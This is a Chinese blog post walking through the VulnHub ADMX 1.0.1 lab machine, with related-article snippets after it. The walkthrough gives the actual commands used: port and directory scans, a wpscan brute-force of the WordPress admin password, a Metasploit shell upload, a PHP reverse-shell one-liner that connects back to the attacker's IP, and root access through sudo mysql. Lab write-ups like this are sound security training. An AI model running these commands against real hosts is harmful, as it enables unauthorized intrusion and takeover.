Vulnhun_ADMX: 1.0.1

最新推荐文章于 2024-05-03 16:49:47 发布
最新推荐文章于 2024-05-03 16:49:47 发布
阅读量352 收藏 1
点赞数
文章标签: nginx 安全 wordpress centos css
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/116905928
版权


主机信息

kali: 192.168.254.135
ADMX:: 192.168.254.159

信息收集

通过nmap扫描目标主机发现只开放了80端口

nmap -T4 -p- -A -v 192.168.254.159


打开网站发现是apache的默认页面

查看首页源码也没有发现有用的信息

扫描网站目录发现以下几个目录

dirb http://192.168.254.159 /usr/share/wordlists/dirb/big.txt


打开查看wordpress目录

使用wpsan对网站进行扫描发现存在admin用户

wpscan --url http://192.168.254.159/wordpress --enumerate


通过wpscan对wordpress对admin账户进行爆破得到密码adam14

wpscan --url http://192.168.254.159/wordpress -U admin -P /usr/share/wordlists/rockyou.txt

getshell

然后使用msf上传shell

msfconsole


查找exp

search wp_admin shell


使用exp

use exploit/unix/webapp/wp_admin_shell_upload


输入目标主机信息

输入run执行,并返回shell

在home目录下发现wpadmin用户

查看第一个flag

查看wp-config.php文件发现数据库密码

使用adam14发现可以切换到wpadmin账户

然后获取一个交互式shell

/bin/sh -i


使用sudo -l发现mysql可以无密码以root身份运行

当尝试项html目录下写入webshell时发现wpadmin和www-data用户均没有权限

然后通过传php文件执行反弹shell也失败

最后我们通过php获取一个shell

php -r '$sock=fsockopen("192.168.254.135",4321);exec("/bin/sh -i <&3 >&3 2>&3");'


接着使用python获取一个交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash");'

提权

然后切换到wpadmin账户登录mysql

sudo /usr/bin/mysql -u root -D wordpress -p



登录之后使用mysql中的system函数,执行命令

MariaDB [wordpress]> system id


最后查看flag

好书推荐

贾平凹刺穿命运之作,写给每一个在浮华都市里身心俱疲、困惑止步、孤独前行的你。每一本都是镜子,给你看清自己和人性;四本一起是利剑,你便可穿透命运的厚墙!

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

NowSec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
t6AdmX_new靶机
08-03
t6AdmX_new靶机
vulhub - ADMX: 1.0.1 writeup
Jiajiajiang_的博客
05-20 233
目标发现 & 端口扫描 又只有80端口是开的。(为什么说又 目录扫描 嗯嗯嗯?wordpress,送分题?(不是 上wpscan 有个admin用户 命令:wpscan --url http://192.168.154.132/wordpress --enumerate u 好的是送分题 命令:wpscan --url http://192.168.154.132/wordpress -eu -P /usr/share/wordlists/rockyou.txt ...
vulnhub靶机--AdmX_new
weixin_46107179的博客
04-08 3879
靶机下载地址:靶机下载 主机发现 通过nmap扫描得到主机IP地址 信息搜集 通过nmap对IP地址扫描,得到信息,只有80端口 然后通过浏览器访问,发现只有Ubuntu的默认页面,于是利用feroxbuster -u http://192.168.137.145:80 扫描目录,发现是WordPress框架,但有很多重定向的url 于是用burpsuite来抓取一下这个数据包来分析,发现这写重定向都是定向到另外一个ip 需要通过burpsuite里面的proxy模块的options功能,将其响应头
kali之vulnhub,Admx_new
weixin_54431413的博客
05-11 623
一、靶场环境部署 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录开启的服务端口 六、进行目录扫描 七、暴力破解 八、利用wordpress后台 九、拿下wpadmin的shell
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1234
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Vulnhun_VULNCMS: 1
qq_45434762的博客
06-26 498
主机信息kali:192.168.1.12 VULNCMS: 1:192.168.1.6 信息收集使用netdiscover发现目标主机netdiscover -r 192.168.1.0...
Windows ADMX/ADML
08-05
包括 Windows 8.1 及以上,Windows Server 2012 R2 及以上,所有 Windows 系统的 ADMX/ADML 模板文件,用于部署组策略管理模板。参考文档: https://mp.csdn.net/mp_blog/creation/editor/126182767。
EvergreenAdmx:使Admx文件保持最新状态的脚本
05-27
长荣Admx 部署了多个Windows Virtual Desktop环境后,我决定不再希望手动下载所需的Admx文件,而是想要一种使它们保持最新状态的方法。 该脚本解决了两个问题。 检查存在的Admx文件的较新版本,并在找到新版本时进行...
horizon vdm_agent.admx代理组策略模板
12-05
Vmware 云桌面策略模板 支持horizon7.3.2 以及以下版本 (更高版本也支持,但没亲自测试过)
policy_templates.zip
05-13
policy_templates中有3个目录:chromeos、通用(包含带有所有Chrome策略设置的完整说明的html文件、indows –包含两种格式的Chrome策略模板:ADM和ADMXadmx是较新的管理策略格式)
Admx_new
果粒程
11-22 286
Admx_new
AdmX_new靶机
weixin_45691672的博客
06-16 433
实验主机:AdmX_new靶机一台/Kali linux攻击机一台AdmX_new靶机 IP:192.168.3.9Kali linux攻击机 IP:192.168.3.32实验网络:桥接模式实验目标:获取靶机的Root权限。
AdmX_new靶机打靶过程及思路
qq_52610024的博客
04-11 2420
pty.spawn(“/bin/bash”)’利用数据库密码登录wpadmin发现失败,开始登录数据库,mysql-uadmin-pWp-Admin#123。sudo发现一个文件有sudo权限,使用命令输入最开始的密码,登录进的数据库拥有root权限,思考使用数据库提权,查看wp-config.php下的数据库账号密码,尝试密码复用的可能性,想到最开始的登录界面的管理员账号密码,拿过来尝试su发现成功,获取到第一个flag文件。9.仍然尝试在404页面插入一句话木马,用蚁剑连接获得新的shell,...
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、蚁剑上线、利用MySQL提权
qq_40898302的博客
05-12 454
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
VulnHun实战——DerpNStink:1
m0_63200360的博客
05-22 315
扫描站点漏洞:wpscan --url http://derpnstink.local/weblog/ --api-token HyETL1kAFHUZersgVa8wZnb2ysXXswzJTL2uaQG4fVw。设置获取IP方式为NAT,然后扫描NAT 所在的网段:nmap -sn 192.168.27.0/24。扫描靶机网站目录:dirb http://192.168.27.148/扫描靶机端口开启哪些端口:nmap -p- 192.168.27.148。192.168.27.148为靶机IP。
AdmX_new靶机渗透过程
捣蛋鬼
04-02 4625
文章目录前言一、主机发现/端口扫描二、路径爆破/匹配替换三、密码爆破获得admin密码四、漏洞利用五、密码重用/MySQL提权总结 前言 靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z 难度:中(2个flag和root权限) kali:10.0.2.4 靶机:10.0.2.7 192.168.159.145
逻辑漏洞:水平越权、垂直越权靶场练习
qq_68163788的博客
05-02 929
水平越权和垂直越权是组织中常见的管理问题,指的是员工在组织中所拥有的权力和责任超出其职位所应具备的范围。 水平越权是指员工在同一级别的职位上超越了其同事的权力和责任范围,通常表现为某个员工在团队中承担了过多的任务或权力,导致其他同事感到不公平或不满。 垂直越权则是指员工在组织中超越了其职位等级的权力和责任范围,通常表现为员工在没有得到上级批准的情况下做出决策或行动,可能会导致组织内部的混乱和冲突。
软件应用开发安全设计指南
最新发布
weixin_41039677的博客
05-03 311
在设计系统架构时,要充分考虑各种安全威胁,如DDoS攻击、SQL注入、跨站脚本攻击(XSS)等,并采取相应的防护措施。设计时要充分考虑到系统架构的稳固性、可维护性和可扩展性,以确保系统在面对各种安全威胁时能够稳定运行。设计审计和日志记录功能,以记录系统的活动和事件,为安全审计和故障排除提供依据。对网络通讯进行严格的身份验证和访问控制,防止未经授权的访问和数据泄露。在设计软件功能时,要充分考虑功能的安全性,避免引入潜在的安全漏洞。限制对存储设备的物理访问权限,防止未经授权的访问和数据篡改。
创造未来知识管理新篇章:Ollama与AnythingLLM联手打造个人与企业的安全知识库!
跟着大数据和AI去旅行
04-30 1143
Ollama是一个开源的大型语言模型服务工具,它帮助用户快速在本地运行大模型。通过简单的安装指令,用户可以执行一条命令就在本地运行开源大型语言模型,如Llama 2。Ollama极大地简化了在Docker容器内部署和管理LLM的过程,使得用户能够快速地在本地运行大型语言模型。打造个性化聊天机器人:用Ollama和Open WebUI搭建你的私有ChatGPT!windows 下 docker compose 安装 ollama 和 open-webui ,打造私有GPT。
apphvsi.admx
09-01
apphvsi.admx是一种用于管理应用虚拟化的Windows组策略模板文件。组策略是Windows操作系统中的一种集中管理和配置计算机和用户设置的工具。使用apphvsi.admx文件,管理员可以在组策略中定义和配置应用虚拟化相关的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值